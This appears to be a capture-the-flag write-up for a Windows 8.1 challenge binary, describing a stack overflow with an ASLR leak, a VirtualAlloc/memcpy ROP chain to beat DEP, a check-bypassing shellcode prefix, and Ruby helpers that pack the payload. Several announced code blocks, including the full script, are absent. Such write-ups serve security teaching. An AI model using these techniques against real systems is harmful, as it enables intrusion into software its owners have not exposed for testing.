For this challenge, we’re given an .exe file and a server that it’s running on. Running strings on the binary, we see that there’s a lot of text in the program. It’s all instructions on how to get started with Windows exploitation. One block that is particularly interesting is:
So, looking at where this string is used we can see that it’s printed out, and then a function is called that has ReadFile inside of it.
I think it’s safe to guess that the 0x800 (2048) passed to that function is the amount to read, and that ReadFile is reading from input. Above that call we can see sub esp, 400h, which makes only 0x400 bytes of room on the stack… so we have a classic buffer overflow!
One problem though. We don’t know where our buffer is! The problem description said this is a Windows 8.1 challenge, so we have to deal with ASLR and DEP (i.e., the stack is not executable).
So, when running the binary, we get a prompt for a password. Inputting GreenhornSecretPassword!!! works and we get a menu. One of the options is (A)SLR. This will print out the address of a variable on the stack as well as the program base address. We figure that two variables on the stack will be the same distance apart from each other on different systems, so we can use this to get the address of our vulnerable buffer! Starting it in a debugger, getting the ASLR variable printout, and setting a breakpoint in the vulnerable function… we subtract the address of the buffer at the breakpoint from the address printed and we’ve got our offset from the ASLR leak to our buffer:
inputBuffer = aslrLeak-0x3F8
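As a small illustration, the arithmetic above could be wrapped in a helper like the one below. The method name and the sample leak value are made up for the example; only the 0x3F8 distance comes from the debugger session described above.

```ruby
# Distance between the stack variable printed by the (A)SLR menu option
# and the vulnerable buffer, as measured in the debugger.
LEAK_TO_BUFFER = 0x3F8

# Hypothetical helper: turn the leaked stack address into the buffer address.
def input_buffer_from_leak(aslr_leak)
  aslr_leak - LEAK_TO_BUFFER
end

leak = 0x0018FF00 # made-up example value, not a real leak
puts format('inputBuffer = 0x%08X', input_buffer_from_leak(leak))
```

Because the distance between the two stack variables stays fixed, the same constant should work against the remote server even though the absolute addresses change on every run.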
That took care of ASLR. But how do we get around DEP? Return Oriented Programming is the answer. On Windows, the flow we need goes like this:
- VirtualAlloc a section of Readable, Writable, Executable memory to execute from.
- memcpy our shellcode into this region of memory from wherever our input is
- call the executable shellcode buffer.
So, using this knowledge, we build a ROP chain. To get started, we need to know where the first return address is on the stack compared to our input buffer. We do this in our debugger by just stepping to the first ret after our input buffer is read in. The return address will be the first value on the stack, and we can subtract the address of our buffer from that stack address. This gives us inputBuffer+0x402 as our first return address overwrite, and this will be where the ROP chain starts.
ret will execute, pop the address we put at inputBuffer+0x402 off the stack, and execute at that address. We want to call VirtualAlloc… and a function that just calls VirtualAlloc is in the binary, so the first entry on our ROP chain can be the program base address plus the offset of that function.
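To make the layout concrete, here is a minimal sketch of how the bytes sent to the vulnerable function could be arranged. The helper name, the filler byte and the sample values are assumptions for illustration; only the 0x402 offset is taken from the debugger measurement above.

```ruby
# Distance from the start of inputBuffer to the saved return address.
RET_OFFSET = 0x402

# Hypothetical helper: shellcode first, filler up to the return address,
# then the ROP chain, which overwrites the return address and what follows.
def build_payload(shellcode, rop_chain, filler = "\x90")
  if shellcode.bytesize > RET_OFFSET
    raise ArgumentError, 'shellcode does not fit before the return address'
  end
  shellcode.b + filler.b * (RET_OFFSET - shellcode.bytesize) + rop_chain.b
end

# Placeholder shellcode and a single dummy chain entry, packed little-endian.
payload = build_payload("\xCC" * 16, [0x41414141].pack('V'))
puts payload.bytesize
```

Everything before RET_OFFSET stays inside the buffer and saved frame data; the first four bytes after it are what ret pops.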
Now that we’ve got execution going back to a function that calls VirtualAlloc, we need to set up its arguments on the stack correctly. ESP is now pointing to the next spot in our ROP chain, and if we look at the VAlloc function we can see that this next spot + 4 is where the first argument is (and the next arguments are after that). Note that there is a push ebp at the beginning of the function that adds a 4-byte value to the stack, which makes the arguments in our ROP chain (that would otherwise start at esp+4) correspond to esp+8 in the assembly.
So, we can make our chain:
Now, we can step through the function and we’ll see that when it gets to the ret, the value at ESP is our first 0 that didn’t matter to us at the time. This is one of the very important parts of ROP: we need to advance the stack past the values we had to have on the stack for this function call. This will place ESP at the next open spot in our ROP chain.
But how do we do this? Well, we know that the 0 we didn’t care about will be the next address to be executed. We know that there are 16 bytes of data after it that ESP needs to get past. We use something called a ROP gadget to do this. The ROP gadget we need should take 16 bytes off the stack and then return to the first value after that. We can find one at offset 0x99E in the binary:
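To see why such a gadget lines ESP up with the next chain entry, here is a toy model of the stack in Ruby. It is only a simulation with symbolic names (none of them come from the binary), where each array element stands for one 4-byte stack slot.

```ruby
# Toy model: the stack as a list of 4-byte slots, esp as an index into it.
chain = [
  :valloc_fn,                 # first return address: the VirtualAlloc wrapper
  :cleanup_gadget,            # where the wrapper returns to (the former "0" slot)
  :arg1, :arg2, :arg3, :arg4, # 16 bytes of arguments for the wrapper
  :next_entry                 # where we want execution to continue
]

esp = 0
trace = []

# ret: pop one slot and "jump" to it.
ret = lambda do
  target = chain[esp]
  esp += 1
  trace << target
  target
end

ret.call # the vulnerable function returns into valloc_fn
ret.call # valloc_fn returns into the cleanup gadget
esp += 4 # the gadget discards 16 bytes (4 slots) ...
ret.call # ... and its own ret lands on the next chain entry
p trace
```

Without the 16-byte skip, the gadget's ret would try to execute the first argument as an address.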
Remember our strategy from before? The next thing we need to call after this is memcpy to copy our input buffer into the RWX space. Naturally, the next ROP entry will be the address of a memcpy occurrence in the binary, then a gadget to clean up the stack by 4*number of arguments, then the next function…
But wait! Arguments for memcpy: destination, source, size. The destination should be our RWX buffer… which we don’t know until VAlloc is called. Luckily, the VAlloc function above has a fourth argument that represents an address to write the buffer address to. We can set that argument to ropStart+0x22 to point to a value we’ll leave as 0 when we build our ROP. So, we have:
This is all there is to the ROP chain! The last entry in it is the address of a gadget that does “call eax”, because, luckily, eax happened to contain the RWX buffer address after everything was done and copied.
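As a rough sketch of how a chain of this shape could be packed in Ruby: every offset below except 0x99E is a hypothetical placeholder, the first three VirtualAlloc-wrapper arguments are assumed values (a size, MEM_COMMIT|MEM_RESERVE and PAGE_EXECUTE_READWRITE), and the slot layout is illustrative, so it need not match the offsets of the real chain.

```ruby
# One "call" in the chain: function, the gadget it returns into, then arguments.
def rop_call(fn_addr, cleanup_addr, args)
  ([fn_addr, cleanup_addr] + args).pack('V*') # 'V' = 32-bit little-endian
end

def build_chain(base:, rop_start:, input_buffer:, copy_size:)
  valloc_fn = base + 0x1000 # hypothetical offset of the VirtualAlloc wrapper
  memcpy_fn = base + 0x2000 # hypothetical offset of memcpy
  skip_12   = base + 0x3000 # hypothetical gadget: drop 12 bytes, ret
  call_eax  = base + 0x4000 # hypothetical gadget: call eax
  skip_16   = base + 0x99E  # gadget from the text: drop 16 bytes, ret

  # In this sketch the memcpy destination slot sits 8 dwords into the chain:
  # 6 dwords for the first call, then memcpy's address and its cleanup gadget.
  dest_slot = rop_start + 8 * 4

  rop_call(valloc_fn, skip_16, [0x1000, 0x3000, 0x40, dest_slot]) +
    rop_call(memcpy_fn, skip_12, [0, input_buffer, copy_size]) + # dest left as 0
    [call_eax].pack('V')
end

rop = build_chain(base: 0x00400000, rop_start: 0x0018FF0A,
                  input_buffer: 0x0018FB08, copy_size: 0x400)
puts rop.unpack('V*').map { |v| format('0x%08X', v) }
```

The destination slot is left as 0 on purpose: the wrapper is expected to write the freshly allocated address into it before memcpy runs.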
We have our ROP chain copying the input buffer over and trying to call it. Now we need to give it some valid shellcode. If we look at the vulnerable function there is a small restriction, though:
Haha, OK, so it wants any of the letters in “CSAW” to occur in the first 4 bytes of the input buffer. We can make that happen:
The V is just to indicate we want the program to go to the vulnerable function; the input buffer starts after it. The code assembles to:
The 53h satisfies the check for an S at index 2 and it passes the checks.
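A quick way to test candidate shellcode prefixes locally is a small predicate like the one below. It models the check only as described above (any of the letters C, S, A, W somewhere in the first four bytes); the real check in the binary may be stricter, for example positional, and the byte sequences used here are made-up examples.

```ruby
# Assumed reading of the check: at least one of the first four bytes
# is the ASCII code of C, S, A or W.
def passes_csaw_check?(input)
  input.bytes.first(4).any? { |b| 'CSAW'.bytes.include?(b) }
end

# 0x53 is ASCII 'S' and also the x86 opcode for push ebx.
with_s    = [0x90, 0x90, 0x53, 0x90].pack('C*')
without_s = [0x90, 0x90, 0x90, 0x90].pack('C*')

puts passes_csaw_check?(with_s)
puts passes_csaw_check?(without_s)
```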
Getting into Windows Shellcoding is beyond the scope of this writeup, but the gist of my shellcode is:
- Get addresses of useful functions from kernel32.dll(CreateFile, ReadFile)
- Get address of output-to-user function from module base
- CreateFile “key”
- ReadFile the handle returned by CreateFile
- Call the output-to-user fn with the buffer read in.
Do all of this, and we get the flag output back to us.
My shellcode is more than a little hairy, as I store all the useful stuff arbitrarily on the stack without setting the stack up at the beginning like a normal function would. Don’t trust the comments, they might be outdated.
Here it is:
And here's the full Ruby script: